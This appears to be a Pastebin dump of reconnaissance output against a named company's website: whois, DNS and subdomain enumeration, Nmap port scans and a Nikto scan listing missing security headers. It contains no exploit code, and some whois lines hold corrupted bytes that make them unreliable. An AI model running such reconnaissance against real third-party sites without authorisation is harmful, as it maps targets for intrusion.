Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname theredelephants.com ISP Google LLC
- Continent North America Flag
- US
- Country United States Country Code US
- Region Virginia Local time 07 Nov 2018 23:10 EST
- City Unknown Postal Code Unknown
- IP Address 104.196.67.80 Latitude 38.658
- Longitude -77.25
- #######################################################################################################################################
- > theredelephants.com
- Server: 194.187.251.67
- Address: 194.187.251.67#53
- Non-authoritative answer:
- Name: theredelephants.com
- Address: 104.196.67.80
- #######################################################################################################################################
- HostIP:104.196.67.80
- HostName:theredelephants.com
- Gathered Inet-whois information for 104.196.67.80
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 104.153.88.0 - 104.232.35.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: You can find the whois server to query, or the
- remarks: IANA registry to query on this web page:
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks:
- remarks: You can access databases of other RIRs at:
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: IANA IPV4 Recovered Address Space
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- mnt-lower: RIPE-NCC-HM-MNT
- created: 2018-08-07T14:17:36Z
- last-modified: 2018-09-04T13:35:24Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.92.6 (HEREFORD)
- Gathered Inic-whois information for theredelephants.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Domain Name: THEREDELEPHANTS.COM
- Registry Domain ID: 2073176903_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.godaddy.com
- Registrar URL: http://www.godaddy.com
- Updated Date: 2016-11-10T21:43:26Z
- Creation Date: 2016-11-10T21:43:26Z
- Registry Expiry Date: 2019-11-10T21:43:26Z
- Registrar: GoDaddy.com, LLC
- Registrar IANA ID: 146
- Registrar Abuse Contact Email: abuse@godaddy.com
- Registrar Abuse Contact Phone: 480-624-2505
- Domain Status: clientDeleteProhibited https:/�U@/ican�~Hn0.or�g/epp#O9jv�clU@ientDU9jv�el�U@etePr�������ohibite�U@d
- Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Name Server: NS57.DOMAINCONTROL.COM
- Name Server: NS58.DOMAINCONTROL.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-11-08T04jV@:17:2�zH00Z <�<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- �egistrar. Users may consult the sponsoring reg�U@abase�~H 0to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons�U@matio�~Hn0
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automat�U@ed, e�~Hl0ectgronic �9jv�prU@ocess�9jv�es�U@
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in�U@ its �~Hs0ole discreS:jv�tiU@on toY:jv� e�U@nsure��������
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Gathered Netcraft information for theredelephants.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for theredelephants.com
- Netcraft.com Information gathered
- Gathered Subdomain information for theredelephants.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 possible subdomain(s) for host theredelephants.com, Searched 0 pages containing 0 results
- Gathered E-Mail information for theredelephants.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host theredelephants.com, Searched 0 pages containing 0 results
- Gathered TCP Port information for 104.196.67.80
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 80/tcp open
- Portscan Finished: Scanned 150 ports, 2 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://theredelephants.com
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Home - The Red Elephants
- [+] IP address: 104.196.67.80
- [+] Web Server: Could Not Detect
- [+] CMS: WordPress
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- -----------[end of contents]-------------
- W H O I S L O O K U P
- =======================================================================================================================================
- Domain Name: THEREDELEPHANTS.COM
- Registry Domain ID: 2073176903_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.godaddy.com
- Registrar URL: http://www.godaddy.com
- Updated Date: 2016-11-10T21:43:26Z
- Creation Date: 2016-11-10T21:43:26Z
- Registry Expiry Date: 2019-11-10T21:43:26Z
- Registrar: GoDaddy.com, LLC
- Registrar IANA ID: 146
- Registrar Abuse Contact Email: abuse@godaddy.com
- Registrar Abuse Contact Phone: 480-624-2505
- Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
- Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Name Server: NS57.DOMAINCONTROL.COM
- Name Server: NS58.DOMAINCONTROL.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-11-08T04:17:34Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 104.196.67.80
- [i] Country: US
- [i] State: California
- [i] City: Mountain View
- [i] Latitude: 37.419201
- [i] Longitude: -122.057404
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Thu, 08 Nov 2018 04:17:49 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
- [i] Pragma: no-cache
- [i] Link: <http://theredelephants.com/wp-json/>; rel="https://api.w.org/"
- [i] Link: <http://theredelephants.com/>; rel=shortlink
- [i] WPE-Backend: apache
- [i] X-Cacheable: SHORT
- [i] Vary: Accept-Encoding,Cookie
- [i] Cache-Control: max-age=600, must-revalidate
- [i] X-Pass-Why:
- [i] X-Cache-Group: normal
- [i] X-Type: default
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- theredelephants.com. 599 IN A 104.196.67.80
- theredelephants.com. 3599 IN NS ns57.domaincontrol.com.
- theredelephants.com. 3599 IN NS ns58.domaincontrol.com.
- theredelephants.com. 599 IN SOA ns57.domaincontrol.com. dns.jomax.net. 2017032701 28800 7200 604800 600
- theredelephants.com. 599 IN MX 0 theredelephants-com.mail.protection.outlook.com.
- theredelephants.com. 599 IN TXT "NETORGFT2476217.onmicrosoft.com"
- theredelephants.com. 599 IN TXT "v=spf1 include:spf.protection.outlook.com -all"
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 104.196.67.80
- Network = 104.196.67.80 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 104.196.67.80 - 104.196.67.80 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-08 04:17 UTC
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.056s latency).
- rDNS record for 104.196.67.80: 80.67.196.104.bc.googleusercontent.com
- PORT STATE SERVICE
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
- S U B - D O M A I N F I N D E R
- =======================================================================================================================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: shop.theredelephants.com
- [-] IP: 23.227.38.32
- #######################################################################################################################################
- [?] Enter the target: http://theredelephants.com/
- [!] IP Address : 104.196.67.80
- [!] CMS Detected : WordPress
- [+] Honeypot Probabilty: 0%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for theredelephants.com
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/theredelephants.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] Robots.txt retrieved
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns58.domaincontrol.com. (173.201.76.29) AS26496 GoDaddy.com, LLC United States
- ns57.domaincontrol.com. (216.69.185.29) AS26496 GoDaddy.com, LLC United States
- [+] MX Records
- 0 (216.32.181.74) AS8075 Microsoft Corporation United States
- [+] Host Records (A)
- shop.theredelephants.comHTTPS: (23.227.38.32) AS62679 Shopify, Inc. Canada
- theredelephants.comHTTP: (80.67.196.104.bc.googleusercontent.com) (104.196.67.808) AS15169 Google Inc. United States
- [+] TXT Records
- "NETORGFT2476217.onmicrosoft.com"
- "v=spf1 include:spf.protection.outlook.com -all"
- [+] DNS Map: https://dnsdumpster.com/static/map/theredelephants.com.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 23.227.38.32:shop.theredelephants.com
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- [-] No fuzzable URLs found
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> theredelephants.com
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36741
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;theredelephants.com. IN A
- ;; ANSWER SECTION:
- theredelephants.com. 569 IN A 104.196.67.80
- ;; Query time: 131 msec
- ;; SERVER: 194.187.251.67#53(194.187.251.67)
- ;; WHEN: jeu nov 08 00:04:06 EST 2018
- ;; MSG SIZE rcvd: 64
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> +trace theredelephants.com
- ;; global options: +cmd
- . 80263 IN NS g.root-servers.net.
- . 80263 IN NS j.root-servers.net.
- . 80263 IN NS a.root-servers.net.
- . 80263 IN NS e.root-servers.net.
- . 80263 IN NS l.root-servers.net.
- . 80263 IN NS h.root-servers.net.
- . 80263 IN NS k.root-servers.net.
- . 80263 IN NS b.root-servers.net.
- . 80263 IN NS d.root-servers.net.
- . 80263 IN NS i.root-servers.net.
- . 80263 IN NS f.root-servers.net.
- . 80263 IN NS m.root-servers.net.
- . 80263 IN NS c.root-servers.net.
- . 80263 IN RRSIG NS 8 0 518400 20181120220000 20181107210000 2134 . Qylc8NheF7StaTxWEy2yrEXkZ3sAYie5RUTX2TcYvHjtijlLOAonirXt 30YkkBEny9wP6rJvgJUhH2EtdwaMDeUATtJ7m1NYK1NVnHgasFeOLHa2 b0sXr+nazG1FHt11//G9l+9Vip87lbdOYV8lvsNAW6tLlTwLE/qFG7UV IvSAyiMqQT0jY7KKcCcXH8AikdB1G4PRrh01e2WoLAY1AF+1b0Q8N5Pf jHyToT7lBNwhpOnX2YIbRI6Ics++V0c4GY+saKDtXfM9Fq10KSYVxXCT PWl2tkdPqxe31z1GZGGApDSk+zPVXclK1qNwIPBahW6GPMLMG+rEkx+4 QgJuvA==
- ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 131 ms
- com. 172800 IN NS d.gtld-servers.net.
- com. 172800 IN NS e.gtld-servers.net.
- com. 172800 IN NS f.gtld-servers.net.
- com. 172800 IN NS h.gtld-servers.net.
- com. 172800 IN NS j.gtld-servers.net.
- com. 172800 IN NS c.gtld-servers.net.
- com. 172800 IN NS l.gtld-servers.net.
- com. 172800 IN NS k.gtld-servers.net.
- com. 172800 IN NS b.gtld-servers.net.
- com. 172800 IN NS m.gtld-servers.net.
- com. 172800 IN NS a.gtld-servers.net.
- com. 172800 IN NS g.gtld-servers.net.
- com. 172800 IN NS i.gtld-servers.net.
- com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
- com. 86400 IN RRSIG DS 8 1 86400 20181120220000 20181107210000 2134 . BakYugE3VSP66X4pJ7B+IZtMJaZ6+l4x7NczwBSDfzGKpQum68cPBiF6 KGCfs/cQnWaJHQ4HhS5si2lZnsEisqxjDzX0EV4/Nr7jGHY1ogC/7/S0 gYOnF3Sm0a0kcL4Ia0FrmojatupJN+6ssP9aWuQQiT91VKCxUiXHhJps jd4K+KEX8GInYZi0YH9ZTnsVBC3Ymu7v68NmHcWPU2hHmXitdNbAIlK8 IjbMd8a+WygGyzfwJmQD+J8TaZuHHHrRNMl1wUb6Vz5KsJwgZTo1HTJr CVHP497jOjkHRY/zMoGpJsZVAWc183oSf4Albhea2Wd7xog1B7PDzSl5 06IBjg==
- ;; Received 1179 bytes from 193.0.14.129#53(k.root-servers.net) in 168 ms
- theredelephants.com. 172800 IN NS ns57.domaincontrol.com.
- theredelephants.com. 172800 IN NS ns58.domaincontrol.com.
- CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
- CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20181112054214 20181105043214 37490 com. VtU+mR9c9/KMSBR8+8jD4tBuYVI02LgCM0l6ajfg0IFDAqgk4pvkQeeu PUolFBvqUhq/skdRtlUSE2SLBl7NqXFu2gzeW+BGQ7qeW/H/C3S2xQfY y+vrQvZXtTGTDRSQ7iKbs+p60HkpC6yW1yO5ZkbB53GLVRmjQDGCRm0i STM=
- M97LE65T4VBCOL9GK8OQ259L1U482JSH.com. 86400 IN NSEC3 1 1 0 - M97M99PVUO3IC50E5BMAJ36NQ9DFRAGU NS DS RRSIG
- M97LE65T4VBCOL9GK8OQ259L1U482JSH.com. 86400 IN RRSIG NSEC3 8 2 86400 20181114061819 20181107050819 37490 com. bOEH+NUC9FY/zTM07GGhuE14YrjCoBA4SonI8ErT5UNloBDX4OXKZviH hC/q4pawS1MBhT5Z3+6WcL5puzblZu6t8C16qkVS45dnVsj3D7UawpTc NW+DEBzHnEOBj/VW4AFoPTZI+rNi2UqFJYr3+HvkAEHszJjR/Qv8WfEZ DPA=
- ;; Received 673 bytes from 192.5.6.30#53(a.gtld-servers.net) in 413 ms
- theredelephants.com. 600 IN A 104.196.67.80
- theredelephants.com. 3600 IN NS ns57.domaincontrol.com.
- theredelephants.com. 3600 IN NS ns58.domaincontrol.com.
- ;; Received 116 bytes from 2607:f208:206::1d#53(ns57.domaincontrol.com) in 132 ms
- #######################################################################################################################################
- [+] Hosting Info for Website: theredelephants.com
- [+] Visitors per day: 1,700
- [+] IP Address: ...
- [+] IP Reverse DNS (Host): 80.67.196.104.bc.googleusercontent.com
- [+] Hosting Company: Google Inc
- [+] Hosting IP Range: 104.196.0.0 - 104.199.255.255 (262,144 ip)
- [+] Hosting Address: 1600 Amphitheatre Parkway, Mountain View, CA, 94043, US
- [+] Hosting Country: USA
- [+] Hosting Phone: +1-650-253-0000
- [+] Hosting Website: sites.google.com
- [+] CIDR: 104.196.0.0/14
- [+] Hosting CIDR: 104.196.0.0/14
- [+] NS: ns57.domaincontrol.com
- [+] NS: ns58.domaincontrol.com
- #######################################################################################################################################
- ...theredelephants-com:empty
- shop.theredelephants.com:23.227.38.32
- www.theredelephants.com:104.196.67.80#
- #######################################################################################################################################
- Start: 2018-11-08T05:25:42+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.202 0.0% 3 0.8 1.0 0.7 1.4 0.4
- 2.|-- 45.79.12.6 0.0% 3 0.9 0.7 0.6 0.9 0.1
- 3.|-- 45.79.12.8 0.0% 3 2.2 1.2 0.5 2.2 0.9
- 4.|-- eqix-da1.google.com 0.0% 3 1.1 9.1 1.1 25.1 13.8
- 5.|-- 108.170.252.130 0.0% 3 1.6 1.4 1.2 1.6 0.2
- 6.|-- 108.170.233.117 0.0% 3 2.4 1.9 1.5 2.4 0.5
- 7.|-- 209.85.240.17 0.0% 3 26.7 22.0 19.4 26.7 4.1
- 8.|-- 72.14.233.113 0.0% 3 30.0 40.0 30.0 58.7 16.2
- 9.|-- 72.14.239.183 0.0% 3 30.3 30.0 29.7 30.3 0.3
- 10.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 11.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 12.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 13.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 14.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 15.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 16.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 17.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 18.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 19.|-- 80.67.196.104.bc.googleusercontent.com 0.0% 3 30.0 30.2 29.9 30.7 0.4
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: theredelephants.com
- [-] DNSSEC is not configured for theredelephants.com
- [*] SOA ns57.domaincontrol.com 216.69.185.29
- [*] NS ns58.domaincontrol.com 173.201.76.29
- [*] NS ns58.domaincontrol.com 2603:5:22c2::1d
- [*] NS ns57.domaincontrol.com 216.69.185.29
- [*] NS ns57.domaincontrol.com 2607:f208:206::1d
- [*] MX theredelephants-com.mail.protection.outlook.com 216.32.181.106
- [*] MX theredelephants-com.mail.protection.outlook.com 216.32.181.234
- [*] A theredelephants.com 104.196.67.80
- [*] TXT theredelephants.com v=spf1 include:spf.protection.outlook.com -all
- [*] TXT theredelephants.com NETORGFT2476217.onmicrosoft.com
- [*] Enumerating SRV Records
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 52.112.192.75 443 1
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:9::b 443 1
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:5::b 443 1
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:1::b 443 1
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:8::b 443 1
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:3::b 443 1
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:4::b 443 1
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:2::b 443 1
- [*] SRV _sip._tls.theredelephants.com sipdir.online.lync.com 2603:1027:0:7::b 443 1
- [*] SRV _sipfederationtls._tcp.theredelephants.com sipfed.online.lync.com 52.112.192.75 5061 1
- [*] SRV _sipfederationtls._tcp.theredelephants.com sipfed.online.lync.com 2603:1027:0:5::b 5061 1
- [+] 11 Records Found
- #######################################################################################################################################
- [*] Processing domain theredelephants.com
- [+] Getting nameservers
- 173.201.76.29 - ns58.domaincontrol.com
- 216.69.185.29 - ns57.domaincontrol.com
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 include:spf.protection.outlook.com -all"
- "NETORGFT2476217.onmicrosoft.com"
- [+] MX records found, added to target list
- 0 theredelephants-com.mail.protection.outlook.com.
- [*] Scanning theredelephants.com for A records
- 104.196.67.80 - theredelephants.com
- 52.97.133.216 - autodiscover.theredelephants.com
- 52.97.133.248 - autodiscover.theredelephants.com
- 40.100.174.200 - autodiscover.theredelephants.com
- 52.97.133.168 - autodiscover.theredelephants.com
- 72.167.218.55 - email.theredelephants.comm
- 173.201.193.5 - email.theredelephants.com
- 173.201.192.5 - email.theredelephants.com
- 173.201.192.148 - email.theredelephants.com
- 72.167.218.173 - email.theredelephants.com
- 173.201.193.133 - email.theredelephants.com
- 68.178.252.148 - email.theredelephants.com
- 68.178.252.20 - email.theredelephants.com
- 97.74.135.148 - email.theredelephants.com
- 68.178.252.133 - email.theredelephants.com
- 173.201.193.148 - email.theredelephants.com
- 45.40.130.41 - email.theredelephants.com
- 173.201.192.133 - email.theredelephants.com
- 173.201.192.20 - email.theredelephants.com
- 173.201.193.20 - email.theredelephants.com
- 72.167.218.183 - email.theredelephants.com
- 97.74.135.133 - email.theredelephants.com
- 68.178.252.5 - email.theredelephants.com
- 72.167.218.45 - email.theredelephants.com
- 97.74.135.45 - email.theredelephants.com
- 97.74.135.55 - email.theredelephants.com
- 45.40.130.40 - email.theredelephants.com
- 104.196.67.80 - ftp.theredelephants.com
- 52.112.192.78 - lyncdiscover.theredelephants.com
- 104.41.216.18 - msoid.theredelephants.com
- 40.112.64.18 - msoid.theredelephants.com
- 40.112.64.25 - msoid.theredelephants.com
- 23.227.38.32 - shop.theredelephants.com
- 52.112.192.75 - sip.theredelephants.com
- 104.196.67.80 - www.theredelephants.com
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------------------------------------------------------------------------------------------------------------------------------------
- 72.167.218.55 301 alias email.theredelephants.com
- 72.167.218.55 301 host email.secureserver.net
- 173.201.193.5 301 host email.secureserver.net
- 173.201.192.5 301 host email.secureserver.net
- 173.201.192.148 301 host email.secureserver.net
- 72.167.218.173 301 host email.secureserver.net
- 173.201.193.133 301 host email.secureserver.net
- 68.178.252.148 301 host email.secureserver.net
- 68.178.252.20 301 host email.secureserver.net
- 97.74.135.148 301 host email.secureserver.net
- 68.178.252.133 301 host email.secureserver.net
- 173.201.193.148 301 host email.secureserver.net
- 45.40.130.41 301 host email.secureserver.net
- 173.201.192.133 301 host email.secureserver.net
- 173.201.192.20 301 host email.secureserver.net
- 173.201.193.20 301 host email.secureserver.net
- 72.167.218.183 301 host email.secureserver.net
- 97.74.135.133 301 host email.secureserver.net
- 68.178.252.5 301 host email.secureserver.net
- 72.167.218.45 301 host email.secureserver.net
- 97.74.135.45 301 host email.secureserver.net
- 97.74.135.55 301 host email.secureserver.net
- 45.40.130.40 301 host email.secureserver.net
- 104.196.67.80 404 alias ftp.theredelephants.com
- 104.196.67.80 404 host theredelephants.com
- 23.227.38.32 301 host shop.theredelephants.com
- 104.196.67.80 301 alias www.theredelephants.com
- 104.196.67.80 301 host theredelephants.com
- #######################################################################################################################################
- [+] Testing domain
- www.theredelephants.com 104.196.67.80
- [+] Dns resolving
- Domain name Ip address Name server
- theredelephants.com 104.196.67.80 80.67.196.104.bc.googleusercontent.com
- Found 1 host(s) for theredelephants.com
- [+] Testing wildcard
- Ok, no wildcard found.
- [+] Scanning for subdomain on theredelephants.com
- [!] Wordlist not specified. I scannig with my internal wordlist...
- Estimated time about 67.29 seconds
- Subdomain Ip address Name server
- email.theredelephants.com 45.40.130.40 p3plgemwbe26-v05.prod.phx3.secureserver.net
- ftp.theredelephants.com 104.196.67.80 80.67.196.104.bc.googleusercontent.com
- www.theredelephants.com 104.196.67.80 80.67.196.104.bc.googleusercontent.com
- Found 3 subdomain(s) in 3 host(s) in 259.1 second(s)
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 104.196.67.80
- + Target Hostname: 104.196.67.80
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /CN=*.wpengine.com
- Ciphers: ECDHE-RSA-AES256-GCM-SHA384
- Issuer: /C=US/O=DigiCert Inc/OU=www.digicert.com/CN=RapidSSL RSA CA 2018
- + Start Time: 2018-11-08 00:01:53 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: nginx
- + Server leaks inodes via ETags, header found with file /, fields: 0x5be3223e 0x822
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
- + Server is using a wildcard certificate: *.wpengine.com
- + Hostname '104.196.67.80' does not match certificate's names: *.wpengine.com
- + /wordpress/: A Wordpress installation was found.
- + 7534 requests: 0 error(s) and 9 item(s) reported on remote host
- + End Time: 2018-11-08 01:49:16 (GMT-5) (6443 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:02 EST
- Nmap scan report for 104.196.67.80
- Host is up (0.17s latency).
- Not shown: 470 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 2222/tcp open EtherNetIP-1
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:02 EST
- Nmap scan report for 104.196.67.80
- Host is up (0.12s latency).
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:03 EST
- Nmap scan report for 104.196.67.80
- Host is up (0.23s latency).
- PORT STATE SERVICE VERSION
- 67/udp open|filtered dhcps
- |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 117.96 ms 10.245.200.1
- 2 142.92 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 118.75 ms 195.42.145.65
- 4 127.60 ms 108.170.244.240
- 5 129.80 ms 72.14.238.53
- 6 198.86 ms 216.239.54.84
- 7 210.05 ms 209.85.255.252
- 8 210.11 ms 216.239.41.232
- 9 ... 17
- 18 212.31 ms 104.196.67.80
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:05 EST
- Nmap scan report for 104.196.67.80
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
